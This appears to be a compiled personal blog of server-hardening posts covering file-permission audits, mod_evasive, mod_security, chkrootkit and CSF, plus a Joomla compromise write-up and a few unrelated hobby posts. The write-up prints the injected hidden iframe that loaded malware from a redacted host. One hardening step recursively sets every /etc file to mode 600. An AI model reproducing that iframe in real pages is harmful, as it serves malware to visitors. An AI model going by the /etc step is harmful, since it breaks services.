server


  • FaF (File Anomaly Finder) is a wrapper for the *nix 'find' utility. It generates audit reports for data matching specific characteristics, such as setgid/setuid or unowned files, and more. The objective is simply to create a simple anomaly finder that identifies common flawed permissions or otherwise suspicious file system characteristics.

    The main features of FaF are:
    • simplistic and to the point audit reports
    • easy setup and configuration
    • audits emailed to customizable address or user
    • ideal for web servers or general purpose workstations
    • audits of setgid/setuid, hidden, unowned, & world writable data
    • very portable
    http://www.r-fx.org/faf.php

    # wget http://www.r-fx.ca/downloads/faf-current.tar.gz
    # tar xvf faf-current.tar.gz
    # cd faf*
    # ./install.sh

    Install path:     /usr/local/faf/
    Config path:     /usr/local/faf/conf.faf
    Executable path: /usr/local/sbin/faf


    Why do you need such a tool?
    Never trust anyone, including sometimes yourself ;-) Used correctly, this tool ensures that you will never forget any files with too many permissions. It may also reveal a hacker who has put some new files under the user nobody...

    What to do with the output?

    You'll have to react differently for each occurrence in the report....

    SUID/SGID Binaries

    The sticky bit was used on executables in Linux (which was used more often) so that they would remain in memory longer after the initial execution, in the hope that they would be needed again in the near future. But since today we have more sophisticated memory access techniques and the bottleneck related to primary memory is diminishing, the sticky bit is no longer used for this. Instead, it is used on folders, to imply that a file or folder created inside a sticky-bit-enabled folder can only be deleted by its creator. A nice use of the sticky bit is the /tmp folder, where every user has write permission but only the user who owns a file can delete it. Remember that files inside a folder which has write permission can be deleted even if the file itself doesn't have write permission. The sticky bit is useful here.

    SUID or SetUID bit: an executable which has the SUID bit set runs with the ownership of the program owner. That is, if you own an executable and another person runs it, then it runs with your permissions and not theirs. The default is that a program runs with the ownership of the person executing the binary.

    Consider also reading:
    What are the SUID, SGID and the Sticky Bits?

    You can also find them manually by entering:
    # find / -type f \( -perm -04000 -o -perm -02000 \) -exec ls -l {} \;
    The SGID bit is the same as SUID, except that the program runs with the permissions of the group. It can also be set on folders, so that any files or folders created inside the SGID folder get a common group ownership.

    Files in /srv (http root folder)
       You should accept NO files with SUID/SGID in the http root folder. Remove them all:
            # find /srv -type f \( -perm -04000 -o -perm -02000 \) -exec chmod ug-s {} \;

    No Owner/Group
    This may also be an indication that an intruder has accessed your system...
    These files can also be found manually by typing:
    # find / \( -nouser -o -nogroup \) -print
    Files in /srv (http root folder)

    Permissions and ownership work together to keep your server running peacefully. The basic idea is always to give the minimum rights to each file.

    A rule of thumb would be:
    read only for all files: r--r--r-- or r--------
    read and execute for all directories: r-xr-xr-x or r-x------
    The problem is that Apache and PHP also run under their own user...

    A very informative article explaining the problem on a concrete example (Gallery2) can be found at  http://codex.gallery2.org/Gallery2:Security

    At least (worst case), when Apache runs as the wwwrun user in the www group, run in your HTTP directory:
    # chown -R wwwrun .
    # chgrp -R www .
    Then all files have to be rw------- and directories r-x------
    Advantage: you can use the Joomla! administrator panel
    BUT: with any bug in the PHP code, an attack can read or overwrite any file! -> highly insecure

    It would be better to change all files/directories in your HTTP directory to the right web user!
    # chown -R cedric .
    # chgrp -R psacln .
    Change all files/directories that have to be written by Apache (cache directories) to
    # chown -R wwwrun cache
    # chgrp -R www cache
    Advantage: a bug in Apache/PHP, or an attack, cannot touch any of your files.
    BUT: if PHP does not run under your user, the Joomla! panel won't be usable, as Apache/PHP won't be able to install any new components/images.

    Files in / must generally only be available to root
    # chown -R root /etc
    # chgrp -R root /etc
    # find /etc -type f -exec chmod 600 {} \;

    World Writable

    Files in /srv
    must be avoided at all costs! This line removes the world-writable bit from all files in /srv
    # find /srv -type f -exec chmod o-w {} \;
    This line removes the world-writable bit from all directories in /srv
    # find /srv -type d -exec chmod o-w {} \;
    Files in /
    You should ignore /proc files, /dev files (hundreds of these are correctly world writable),
    symbolic (soft) links (which should have mode 777), directories with the sticky (save text) bit on, and
    sockets, as that is relatively safe.
    Hidden Files/Paths

    You should normally have no such files! Try to understand why they are there (search on Google), open them and/or move/delete them.
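The report categories discussed above can be reproduced with plain find predicates. The following is an added example, not FaF's own code and not part of the original article: the function names and the demo tree are constructed for illustration, and the world-writable check applies the exclusions listed above (symbolic links, sockets, sticky directories).

```shell
#!/bin/sh
# audit_tree CATEGORY ROOT: print the paths under ROOT that fall into one
# report category. -xdev keeps find on a single file system, so /proc and
# other mounts below ROOT are not descended into.
audit_tree() {
    category=$1
    root=$2
    case "$category" in
        suid_sgid)
            # Regular files with the setuid (04000) or setgid (02000) bit.
            find "$root" -xdev -type f \( -perm -04000 -o -perm -02000 \) -print ;;
        unowned)
            # Owner or group id that no longer maps to an account.
            find "$root" -xdev \( -nouser -o -nogroup \) -print ;;
        world_writable)
            # Ignore symlinks, sockets and sticky directories (like /tmp).
            find "$root" -xdev -perm -0002 ! -type l ! -type s \
                ! \( -type d -perm -1000 \) -print ;;
        hidden)
            find "$root" -xdev -name '.*' ! -name '.' ! -name '..' -print ;;
        *)
            echo "unknown category: $category" >&2
            return 2 ;;
    esac
}

# audit_report ROOT: run every category and prefix each hit with its name.
audit_report() {
    for c in suid_sgid unowned world_writable hidden; do
        audit_tree "$c" "$1" | sed "s/^/$c: /"
    done
}

# Constructed demo tree (hypothetical file names) with one finding per
# category that can be created without root privileges.
make_demo_tree() {
    d=$(mktemp -d) || return 1
    mkdir "$d/cache" "$d/uploads"
    chmod 755 "$d/cache"
    : > "$d/index.php";           chmod 444 "$d/index.php"
    : > "$d/helper";              chmod 4755 "$d/helper"          # setuid
    : > "$d/cache/page.html";     chmod 666 "$d/cache/page.html"  # world writable
    : > "$d/uploads/.hidden.php"; chmod 644 "$d/uploads/.hidden.php"
    chmod 1777 "$d/uploads"       # sticky and world writable: ignored
    ln -s index.php "$d/link"     # symlink: ignored
    echo "$d"
}

if [ $# -ge 1 ]; then
    audit_report "$1"
else
    demo=$(make_demo_tree) && audit_report "$demo" && rm -rf "$demo"
fi
```

Run it with a directory argument (for example /srv) to audit a real tree; without arguments it audits the constructed demo tree.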
  • These are my mod_evasive settings:
     
    LoadModule evasive20_module     /usr/lib/apache2/mod_evasive20.so
    <IfModule mod_evasive20.c>
      DOSHashTableSize 3097
      DOSPageCount 5
      DOSSiteCount 100
      DOSPageInterval 2
      DOSSiteInterval 2
      DOSBlockingPeriod 600
      DOSEmailNotify [e-mail address hidden]
    </IfModule>

    And this is a small piece of documentation I forgot to add in the previous article:

    • DOSHashTableSize: the size of the table of URL and IP combined. The greater this setting, the more memory is required for the lookup table, but also the faster the lookups are processed. This option will automatically round up to the nearest prime number.
    • DOSPageCount: the number of requests for the same page from the same IP during an interval that will cause that IP to be added to the block list.
    • DOSSiteCount: the number of pages requested of a site by the same IP during an interval which will cause the IP to be added to the block list.
    • DOSPageInterval: interval for the 'DOSPageCount' threshold, in seconds.
    • DOSSiteInterval: interval for the 'DOSSiteCount' threshold, in seconds.
    • DOSBlockingPeriod: the time the IP is blocked (in seconds).
    • DOSEmailNotify: can be used to send an email every time an IP is blocked.
    • DOSSystemCommand: a command to execute when an IP is blocked. It can be used to block the user at a firewall or router.
    • DOSWhiteList: can be used to whitelist IPs such as 127.0.0.1
    So if anybody requests the same page of my homepage 5 times in less than 2 seconds, they will get blacklisted.
    If anybody tries to make more than 100 requests to my homepage in less than 2 seconds, they will get blacklisted.
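The two thresholds above can be replayed offline against a request log before blocking is enabled, to see which clients would be caught and which addresses belong in DOSWhiteList. This is an added example, not part of the original article and not mod_evasive's own algorithm: it is a simplified fixed-window model of the thresholds as described above, it assumes input lines of the form "epoch-seconds client-IP URI", and the sample lines are constructed.

```shell
#!/bin/sh
# replay_evasive [PageCount PageInterval SiteCount SiteInterval
#                 BlockingPeriod "whitelisted IPs"]
# Reads "epoch ip uri" lines on stdin and prints one line per block event.
# Defaults are the values from the configuration above.
replay_evasive() {
    awk -v page_count="${1:-5}" -v page_int="${2:-2}" \
        -v site_count="${3:-100}" -v site_int="${4:-2}" \
        -v block_period="${5:-600}" -v whitelist="${6:-}" '
    BEGIN {
        n_allow = split(whitelist, w, " ")
        for (i = 1; i <= n_allow; i++) allow[w[i]] = 1
    }
    # Count one hit for key and return 1 when the threshold is reached
    # inside the current window. A new window starts once the old one
    # is at least "interval" seconds old.
    function hit(key, t, limit, interval) {
        if (!(key in start) || t - start[key] >= interval) {
            start[key] = t
            count[key] = 0
        }
        count[key]++
        return count[key] >= limit
    }
    function block(ip, t, why) {
        until[ip] = t + block_period
        print ip, why
    }
    NF >= 3 {
        t = $1; ip = $2; uri = $3
        if (ip in allow) next                      # DOSWhiteList
        if ((ip in until) && t < until[ip]) next   # still blocked
        if (hit(ip SUBSEP uri, t, page_count, page_int)) {
            block(ip, t, "page " uri)              # DOSPageCount reached
        } else if (hit(ip, t, site_count, site_int)) {
            block(ip, t, "site")                   # DOSSiteCount reached
        }
    }'
}

# Constructed sample: one client hammering a single page, one slow reader,
# and one browser fetching several different files in a burst.
sample_log() {
    cat <<'EOF'
1000 203.0.113.7 /index.php
1000 203.0.113.7 /index.php
1001 203.0.113.7 /index.php
1001 198.51.100.9 /index.php
1001 203.0.113.7 /index.php
1001 203.0.113.7 /index.php
1001 203.0.113.7 /index.php
1004 198.51.100.9 /index.php
1007 198.51.100.9 /about.php
1007 192.0.2.44 /a.css
1007 192.0.2.44 /b.css
1008 192.0.2.44 /c.css
1008 192.0.2.44 /d.css
EOF
}

sample_log | replay_evasive
```

Lowering the site threshold (for example `replay_evasive 50 2 4 2`) shows how an ordinary browser fetching several files in a burst is caught as well, which is the kind of false positive to look for before choosing the values.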
        
    In less than a week, the following Bots get blacklisted.

  • ModSecurity™ is an open source intrusion detection and prevention engine for web applications (or a web application firewall). Operating as an Apache Web server module or standalone, the purpose of ModSecurity is to increase web application security, protecting web applications from known and unknown attacks. (from http://www.modsecurity.org/)
     
    Installing mod_security as DSO is easier, and the procedure is the same for both Apache branches. First unpack the distribution somewhere (anywhere will do, I copy the .c files in my home),

    # cd
    # wget http://www.modsecurity.org/download/mod_security-1.9.4.tar.gz
    # tar -zxvf mod_security-1.9.4.tar.gz
    # cd mod_security-1.9.4/apache2

    and compile the module with:

    Apache 1: /usr/local/psa/admin/bin/apxs -cia ~/mod_security.c
    Apache 2: /usr/sbin/apxs2 -cia ~/mod_security.c

    The first problem that may occur is the absence of
    • GCC: the GNU Compiler Collection (usually shortened to GCC) is a set of programming language compilers produced by the GNU Project. It is free software distributed by the Free Software Foundation (FSF) under the GNU GPL, and is a key component of the GNU toolchain. It is the standard compiler for the open source Unix-like operating systems, and certain proprietary operating systems derived therefrom such as Mac OS X. [WikiPedia]
    • apache-dev: contains the apxs tool and the Apache headers required to compile a module
    Both can be installed via YaST2...

    Tip: if your apxs2 is not located at /usr/bin/apxs2, you can search for it by typing # find / -name apxs2

    # /usr/sbin/apxs2  -cia ~/mod_security.c
    /usr/share/apache2/build/libtool --silent --mode=compile gcc -prefer-pic -O2 -march=i586 -mcpu=i686 -fmessage-length=0 -Wall -g -fPIC -Wall -fno-strict-aliasing -D_LARGEFILE_SOURCE -DAP_HAVE_DESIGNATED_INITIALIZER -DLINUX=2 -D_REENTRANT -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -D_SVID_SOURCE -D_GNU_SOURCE -DAP_DEBUG -Wmissing-prototypes -Wstrict-prototypes -Wmissing-declarations -pthread -I/usr/include/apache2  -I/usr/include/apache2   -I/usr/include/apache2   -c -o /root/mod_security.lo /root/mod_security.c && touch /root/mod_security.slo
    /usr/share/apache2/build/libtool --silent --mode=link gcc -o /root/mod_security.la  -rpath /usr/lib/apache2 -module -avoid-version    /root/mod_security.lo
    /usr/share/apache2/build/instdso.sh SH_LIBTOOL='/usr/share/apache2/build/libtool' /root/mod_security.la /usr/lib/apache2
    /usr/share/apache2/build/libtool --mode=install cp /root/mod_security.la /usr/lib/apache2/
    cp /root/.libs/mod_security.so /usr/lib/apache2/mod_security.so
    cp /root/.libs/mod_security.lai /usr/lib/apache2/mod_security.la
    cp /root/.libs/mod_security.a /usr/lib/apache2/mod_security.a
    ranlib /usr/lib/apache2/mod_security.a
    chmod 644 /usr/lib/apache2/mod_security.a
    PATH="$PATH:/sbin" ldconfig -n /usr/lib/apache2
    ----------------------------------------------------------------------
    Libraries have been installed in:
       /usr/lib/apache2

    If you ever happen to want to link against installed libraries
    in a given directory, LIBDIR, you must either use libtool, and
    specify the full pathname of the library, or use the `-LLIBDIR'
    flag during linking and do at least one of the following:
       - add LIBDIR to the `LD_LIBRARY_PATH' environment variable
         during execution
       - add LIBDIR to the `LD_RUN_PATH' environment variable
         during linking
       - use the `-Wl,--rpath -Wl,LIBDIR' linker flag
       - have your system administrator add LIBDIR to `/etc/ld.so.conf'

    See any operating system documentation about shared libraries for
    more information, such as the ld(1) and ld.so(8) manual pages.
    ----------------------------------------------------------------------
    chmod 755 /usr/lib/apache2/mod_security.so
    apxs:Error: Config file /etc/apache2/httpd2-prefork.conf not found.

    You can ignore the error in blue, since the resulting shared library (mod_security.so) has been automatically copied into /usr/lib/apache2

    Then copy the desired rule set (modsecurity-general.conf or modsecurity-php.conf) into /etc/apache2

    Edit /etc/apache2/httpd.conf and add the following lines at the end of the file. It is also recommended to use the rules from www.GotRoot.com

    LoadModule security_module /usr/lib/apache2/mod_security.so
    SecFilterEngine On
    Include /etc/apache2/modsecurity_rules/modsecurity-general.conf
    Include /etc/apache2/modsecurity_rules/modsecurity-hardening.conf

    # rule sets found at http://www.gotroot.com/tiki-index.php?page=mod_security+rules
    Include /etc/apache2/modsecurity_rules/gotroot/apache2-rules.conf
    Include /etc/apache2/modsecurity_rules/gotroot/badips.conf
    Include /etc/apache2/modsecurity_rules/gotroot/blacklist2.conf
    Include /etc/apache2/modsecurity_rules/gotroot/blacklist.conf
    Include /etc/apache2/modsecurity_rules/gotroot/exclude.conf
    Include /etc/apache2/modsecurity_rules/gotroot/jitp.conf
    Include /etc/apache2/modsecurity_rules/gotroot/proxy.conf
    Include /etc/apache2/modsecurity_rules/gotroot/recons.conf
    Include /etc/apache2/modsecurity_rules/gotroot/rootkits.conf
    Include /etc/apache2/modsecurity_rules/gotroot/rules.conf
    Include /etc/apache2/modsecurity_rules/gotroot/useragents.conf

    BUT be careful with modsecurity-hardening.conf
    1. This file has to be tuned for your server: log file locations, advanced rule sets. Read it carefully and uncomment the TODO items if needed
    2. By default mod_security is in learning mode: it logs and lets the request pass through (line SecFilterDefaultAction "pass, log"). As soon as you have a good rule set, SecFilterDefaultAction "deny,log,status:500" is recommended
    Restart Apache2 by typing
    # /etc/init.d/apache2 restart

    Now it is time to check if mod_security is running

    # tail -f /var/log/apache2/error_log
    [Mon Aug 21 18:43:38 2006] [notice] Apache/2.0.53 (Linux/SUSE) configured -- resuming normal operations
    [Mon Aug 21 19:01:56 2006] [notice] caught SIGTERM, shutting down
    [Mon Aug 21 19:01:57 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
    [Mon Aug 21 19:01:57 2006] [warn] RSA server certificate CommonName (CN) `h790663.serverkompetenz.net' does NOT match server name!?
    [Mon Aug 21 19:01:57 2006] [warn] RSA server certificate CommonName (CN) `plesk' does NOT match server name!?
    [Mon Aug 21 19:01:57 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
    [Mon Aug 21 19:01:57 2006] [notice] mod_security/1.9.4 configured
    [Mon Aug 21 19:01:57 2006] [warn] RSA server certificate CommonName (CN) `h790663.serverkompetenz.net' does NOT match server name!?
    [Mon Aug 21 19:01:57 2006] [warn] RSA server certificate CommonName (CN) `plesk' does NOT match server name!?
    [Mon Aug 21 19:01:57 2006] [notice] Apache/2.0.53 (Linux/SUSE) configured -- resuming normal operations

  • If you want more control, want to install Joomla yourself or want to install any other CMS, you may also want to try this method. It requires some basic knowledge about SSH / file transfer through.

    Main differences compared to the other method

    • You won’t have any icons in the package manager,
    • You won’t be able to stop these services,
    • More prone to errors

    How to Install

    In the Control Panel of your Synology DSM NAS, go to “Web Services” and activate

    • Enable Web Station
    • Enable MySQL

    Use a terminal to connect to your NAS, preferably as admin, using WinSCP under Windows for example.

    Move to the directory

    /volume1/web

    Upload all your Joomla files into a new directory, for example in

    /volume1/web/joomla

    Point your browser to http://{youservernasname}/joomla/ and finish the installation of Joomla.

  • Work in progress

  • Stop waiting for build & deploy to make code changes. Write code and refresh your browser!

    Use DCEVM to add Java fields, methods and classes and use them without restarting your application server. It is a modification of the HotSpot VM that allows unlimited class redefinition at run-time: you can add/remove fields and methods and change the super types of a class at run-time. The features of DCEVM are likely to be integrated in a future update of Java 8 as part of JEP 159.

    View code changes instantly and increase team velocity!

    Feature                                   DCEVM   JVM Hot Swap
    Changes to method bodies                  yes     yes
    Adding/removing methods                   yes     no
    Adding/removing constructors              yes     no
    Adding/removing fields                    yes     no
    Adding/removing classes                   yes     no
    Adding/removing annotations               yes     no
    Changing static field value               yes     no
    Adding/removing enum values               yes     no
    Modifying interfaces                      yes     no
    Replacing superclass                      yes     no
    Adding/removing implemented interfaces    no      no
    Initializes new instance fields           yes     no

     

  • I am BACK

    Please try to be patient, my homepage will encounter some instabilities until the end of the weekend....

    • I have removed XANEON -> so URL rewriting and SEO is switched off, will try to solve this issue (mod_rewrite not active on server)
    • The new gallery is online, expect major upload of images soon

    New version of my components will soon be deployed to Joomla, in between you can enjoy pictures of boxes below:


  • A lot of people have tried numerous times to download files from my download section without
    success, the error message was always the same

    Unrecoverable error "PCLZIP_ERR_BAD_FORMAT (-10)"

    Also, some tried to unpack the zip file locally using StuffIt/WinRAR/7-Zip and got an error suggesting
    that the archive is damaged.

    Only Internet Explorer users were having issues; this is because Internet Explorer is not able to handle
    compression of all file types. I solved the issue by changing my mod_deflate.conf, which now looks like the following:

    <Location />
    AddOutputFilterByType DEFLATE text/html text/plain text/xml text/css application/x-javascript

    # Make sure proxies don't deliver the wrong content
    Header append Vary User-Agent env=!dont-vary
    </Location>

    I found that I had to use application/x-javascript instead of application/javascript to actually get javascript files on my
    server to be served compressed.

    mod deflate documentation: http://httpd.apache.org/docs/2.0/mod/mod_deflate.html

  • chkrootkit is a tool to locally check for signs of a rootkit. chkrootkit is a common Unix-based program intended to help system administrators check their system for known rootkits. It works by using several mechanisms, including comparison of file signatures to known rootkits and checking for suspicious activity (processes listed in the proc filesystem but not in the output of the 'ps' command).
    Log in to the server with ssh as root user

    Download chkrootkit.
    # wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz

    Unpack the chkrootkit you just downloaded.
    # tar xvzf chkrootkit.tar.gz

    Go to that directory
    # cd chkrootkit

    Compile
    # make sense

    Run
    # chkrootkit

     
    Receive an e-mail every day with the result of chkrootkit
    For the root user
    # crontab -e
    For any user
    # crontab -e -u username

    and add

    0 3 * * * (/usr/sbin/chkrootkit 2>&1 | mail -s "chkrootkit output" -c CC_ADDRESS_1,CC_ADDRESS_2 RECIPIENT_ADDRESS)

    * the correct path can be found with which chkrootkit
    This will run chkrootkit at 3:00 am every day, and e-mail the output to RECIPIENT_ADDRESS with copies to CC_ADDRESS_1 and CC_ADDRESS_2 (placeholders for your own addresses).

    False alarms:
     "Checking `bindshell'... INFECTED (PORTS: 465)" This is normal and  NOT really a rootkit.

    Note
    If you ever get a positive alarm, you can try to remove the rootkit, but all professionals would advise you to reinstall the server from scratch and restore a previous backup (that means saving nothing from the server as soon as the rootkit is revealed....)

  • CSF: A Stateful Packet Inspection (SPI) firewall, Login/Intrusion Detection and Security application for Linux servers. It easily replaces APF (Advanced Policy Firewall) and BFD (Brute Force Detection). It also runs 28 basic but non-obvious checks...

    CSF has a lot of functionality and 2 nice features: it can block traffic from well-known spammer networks
    using the DShield Block List and the Spamhaus DROP List.

    • Straight-forward SPI iptables firewall script
    • Daemon process that checks for login authentication failures for:
      • courier imap and pop3
      • ssh
      • non-ssl cpanel / whm / webmail (cPanel servers only)
      • pure-ftpd
      • password protected web pages (htpasswd)
      • mod_security failures
    • POP3/IMAP login tracking to enforce logins per hour
    • SSH login notification
    • SU login notification
    • Excessive connection blocking
    • WHM configuration interface (cPanel servers only) or through Webmin
    • WHM iptables report log (cPanel servers only)
    • Easy upgrade between versions from within WHM (cPanel servers only) or through Webmin
    • Easy upgrade between versions from shell
    • A standard Webmin Module to configure csf is included in the distribution ready to install into Webmin - csfwebmin.tgz
    • Pre-configured to work on a cPanel server with all the standard cPanel ports open (cPanel servers only)
    • Auto-configures the SSH port if it's non-standard on installation
    • Block traffic on unused server IP addresses - helps reduce the risk to your server
    • Alert when end-user scripts sending excessive emails per hour - for identifying spamming scripts
    • Suspicious process reporting - reports potential exploits running on the server
    • Excessive user processes reporting
    • Excessive user process usage reporting and optional termination
    • Suspicious file reporting - reports potential exploit files in /tmp and similar directories
    • Directory and file watching - reports if a watched directory or a file changes
    • Block traffic on the DShield Block List and the Spamhaus DROP List
    • Pre-configured settings for Low, Medium or High firewall security (cPanel servers only)
    • Works with multiple ethernet devices
    • Server Security Check - Performs a basic security and settings check on the server (cPanel servers only)
    • Allow Dynamic DNS IP addresses - always allow your IP address even if it changes whenever you connect to the internet
    • Alert sent if server load average remains high for a specified length of time
    • mod_security log reporting (if installed)
    • Email relay tracking - tracks all email sent through the server and issues alerts for excessive usage (cPanel servers only)
    • IDS (Intrusion Detection System) - the last line of detection alerts you to changes to system and application binaries

    Installation is straightforward:

    # wget http://www.configserver.com/free/csf.tgz
    # tar xvf csf.tgz
    # cd csf
    # ./install.sh

    Note all ports that are displayed after the installation; these are the ports already in use on your system (UDP, TCP, in and out).
    Review the config file by editing:

    # vi /etc/csf/csf.conf

    and add at least the ports noted before (if you trusted your system before the install ;-))
    Do not allow incoming or outgoing connections to the MySQL port (use ssh local forwarding) or FTP (use scp).
    By default the rules only work for 5 minutes and then get erased. This is the learning mode, you can't break anything. Just continue reading the file csf.conf. It contains a lot of interesting information...
  • This article shows how you can convert a physical Windows system (XP, 2003, 2000, NT4 SP4+) into a VMware virtual machine with the free VMware Converter Starter. The resulting virtual machine can be run in the free VMware Player and VMware Server, and also in VMware Workstation and other VMware products. Vmware Converter comes in handy if you want to switch to a Linux desktop, but feel the need to run your old Windows desktop from time to time. By converting your Windows desktop into a virtual machine, you can run it under VMware Server/Player, etc. on your Linux desktop.

    I will try that this weekend!

  • Spektrum introduces another enormous change for the RC industry—The most affordable full-range 2.4GHz radio ever available. The DX5e brings together the unbeatable control of genuine DSM2 technology with the simplest, easiest-to-use design available, letting anyone, from park fliers to students to instructors and more, take advantage of Spektrum technology for less.

    Mode 2 is most often used in the United States, while Mode 1 is most often used in Europe. There are two other modes that are used overseas; here is a listing of the 4 modes and their actions.

              Left stick                Right stick
              up/down     left/right    up/down     left/right
    Mode 1    elevator    rudder        throttle    aileron
    Mode 2    throttle    rudder        elevator    aileron
    Mode 3    elevator    aileron       throttle    rudder
    Mode 4    throttle    aileron       elevator    rudder
  • After some years of use, you’ll notice increased noise coming from the cooling system. Any fan on the market, even the most expensive or the most silent, will wear out and start making noise. Replacing the fan is done in less than 2 minutes if you follow this little how-to.

    Choosing the right fan

    • Don’t pay too much; better to choose a cheap model and replace it every year or two
    • Below 19 dB, it is difficult to hear a fan running; don’t go over 22 dB of noise
    • You need an 80mm x 80mm x 25mm fan. It is a standard size, you can't go wrong in a shop (other common sizes are 92mm and 120mm)
    • Check that the connector is a 3-pin Molex.
    • It needs to run on 12 volts. The lower the voltage, the lower the noise, but too low and the NAS may overheat, since the air flow is also reduced.

    I paid 8 euros for this Xilence case fan, sold as being silent: 15dB, 1500 rpm, 18.67 CFM, not running below 7V.

    You can safely choose any brand: Papst, Be quiet!, Revoltec, Zalman, Noctua, Noiseblocker. All of these are good if they meet the above requirements; unfortunately they were not available in my favorite shop (www.digitec.ch)

    Open the back side of your Synology NAS, remove the old case fan and replace it with the new one, it is that simple.

    The old one and the new one side by side

    Everything is in place

    You can now enjoy your Synology NAS, the silence is back!

  • 2 weeks ago, a post on Google's official blog announced a project that allows users to step inside the private world of its data centers. For the first time, the company's impressive efficiency records and green ethos have been given a face in the form of the stunning photographs by Connie Zhou and the Street View-able hallways of the Lenoir facility in North Carolina...


    http://www.google.com/about/datacenters/gallery/#/

  • Everything started with an email

    Trojan-Downloader.VBS.Agent
    From: Enrique MONTECRISTO ([e-mail address hidden])
    Sent: Mon 6/18/07 10:04 PM
    To: [e-mail address hidden]
       
    Hello Cedric,
    When I browse your website with Firefox, I get this kind of warning from my GDATA antivirus shield :
    http://www.gdata.de/trade/GB/productview/727/16
    ---------------------------
    Virus: Trojan-Downloader.VBS.Agent.u
    Adress: stat1count.net
    ----------------------------
    Virus: Trojan-Downloader.JS.Agent.fq
    Address: stat1count.net
    ----------------------------
    Is it a fake ?

    The "virus" Trojan-Downloader.JS. appears to be a malicious inline JavaScript somewhere in my homepage.
    Thanks to the Firefox Web Developer toolbar, it was quite easy to locate the malicious script (View all JavaScript).

    The hacker was inserting 2 strange lines in my content. He had tampered with:


    index.php
    // displays queries performed for page
    if ($mosConfig_debug) {
        echo $database->_ticker . ' queries executed';
        echo '<pre>';
        foreach ($database->_log as $k=>$sql) {
            echo $k+1 . "\n" . $sql . '<hr />';
        }
        echo '</pre>';
    }
    doGzip();
    ?>

    <iframe width='1' height='1' border='0' frameborder='0' src='http://xxxx.info/stds/go.php?sid=3'></iframe>

    AND /index2.php

    <html xmlns="http://www.w3.org/1999/xhtml">
            <head>
                <?php echo $mainframe->getHead(); ?>
                <link rel="stylesheet" href="templates/<?php echo $cur_template;?>/css/template_css.css" type="text/css" />
                <link rel="shortcut icon" href="<?php echo $mosConfig_live_site; ?>/images/favicon.ico" />
                <meta http-equiv="Content-Type" content="text/html; <?php echo _ISO; ?>" />
                <meta name="robots" content="noindex, nofollow" />
                <?php if ($my->id || $mainframe->get( 'joomlaJavascript' )) { ?>
                <script language="JavaScript" src="<?php echo $mosConfig_live_site;?>/includes/js/joomla.javascript.js" type="text/javascript"></script>
                <?php } ?>
            </head>
            <body class="contentpane">
               <iframe width='1' height='1' border='0' frameborder='0' src='http://xxxxx.info/stds/go.php?sid=3'></iframe>
                <?php mosMainBody(); ?>
            </body>
        </html>
        <?php


    Which got replaced at runtime with
    http://xxx.info/stds/pages/default.php
    http://xxxxxxx.info/c/2380/counter21.php

    xxxxx.info: I don't want to give publicity to this hacker by publishing his server URL here

    How to find all places potentially infected?

    This returns a list of all files with their path (-H) that contain the substring xxxxx

    # find . -type f  -exec grep -H xxxxx {} \;

    How did I get infected?

    It seems that the hacker used my demo site at demo.waltercedric.com to copy an image onto the server, or to replace an existing one which had bad user rights.
    It may be an image like this one: runme.php.jpg. This image then bootstraps and loads a hacker tool, c99shell (also known as PHP/C99Shell.A or Backdoor.PHP.C99Shell.c)

    PHP/C99Shell-A is a backdoor Trojan for platforms with PHP support, such as web servers. PHP/C99Shell-A listens for commands from a remote user.

    How to avoid that next time

    No file in the Apache root should have more than r--r--r-- rights, so here is a small script that you can put in crontab or save for periodic checks. It automatically changes all files to read-only for all, group and other

    # find . -type f -perm 600 -exec chmod ago=r {} \;


    Joomla! automates the CHMOD during file save, but not on all files in the structure.

    Avoid any files with setuid/setgid in your Apache root
    # find . -type f \( -perm -4000 -o -perm -2000 \) -exec chmod -s {} \;
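
    A read-only audit combining the two checks above (the injected 1x1 iframe and files with more than r--r--r-- rights), added here as an example and not part of the original post. The function names are hypothetical, and GNU find and GNU stat are assumed.

```bash
#!/bin/bash
# Added example: audit a web root without changing anything in it.

# hidden_iframes DIR
# List files under DIR containing an <iframe> whose width or height is 0 or 1,
# the shape of the injected tags shown in index.php and index2.php above.
hidden_iframes() {
    grep -rlEi "<iframe[^>]*(width|height)=[\"']?[01][\"' >]" "$1" 2>/dev/null | sort
}

# over_permissive DIR
# List regular files whose mode has any bit outside r--r--r-- (0444):
# write, execute, setuid, setgid or sticky. Output: "<octal mode> <path>".
over_permissive() {
    find "$1" -type f -perm /7333 -exec stat -c '%a %n' {} + 2>/dev/null | sort -k2
}

# audit_webroot DIR
# Print one line per finding; return 1 if anything was found, 0 otherwise,
# so that a cron wrapper can decide whether to send a mail.
audit_webroot() {
    local iframes perms status=0
    iframes="$(hidden_iframes "$1")"
    perms="$(over_permissive "$1")"
    if [ -n "$iframes" ]; then
        printf '%s\n' "$iframes" | sed 's/^/HIDDEN-IFRAME /'
        status=1
    fi
    if [ -n "$perms" ]; then
        printf '%s\n' "$perms" | sed 's/^/MODE /'
        status=1
    fi
    return "$status"
}
```

    A legitimate embed such as a 560x315 video iframe is not reported; only frames with a 0 or 1 pixel dimension are.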

    Note:


  • ModSecurity(TM) is an open source intrusion detection and prevention engine for web applications (or a web application firewall). Operating as an Apache Web server module or standalone, the purpose of ModSecurity is to increase web application security, protecting web applications from known and unknown attacks. from http://www.modsecurity.org/

    You'll have to create a free account at https://bsn.breach.com to get the real link

    # cd
    # wget https://bsn.breach.com/downloads/t=5156aa8803d6f186cf38688be522a402/modsecurity-apache/modsecurity-apache_2.5.7.tar.gz
    # tar -zxvf modsecurity-apache_2.5.7.tar.gz
    # cd modsecurity-apache_2.5.7/apache2
    # ./configure
    # make

    Copy the library mod_security2.so to /usr/lib/apache2

    # cp /root/modsecurity-apache_2.5.7/apache2/.libs/mod_security2.so /usr/lib/apache2/mod_security2.so

    Then copy all the latest rules into the apache2/conf.d folder

    # cp -r /root/modsecurity-apache_2.5.7/rules /etc/apache2/conf.d/

    Copy the minimal configuration file into apache2/conf.d folder

    # cp /root/modsecurity-apache_2.5.7/modsecurity.conf-minimal /etc/apache2/conf.d/modsecurity2.conf

    Add this line at the top of modsecurity2.conf

    LoadModule security2_module /usr/lib/apache2/mod_security2.so

    Restart apache2 by executing

    # rcapache2 restart

    Verify proper operations by looking at log files

    # tail -f /var/log/apache2/modsec_debug_log

    Attention: this is my location for log files!

    Change

    • audit log location line 191
    • debug log location line 285

    in /etc/apache2/conf.d/rules/modsecurity_crs_10_config.conf

  • checklist

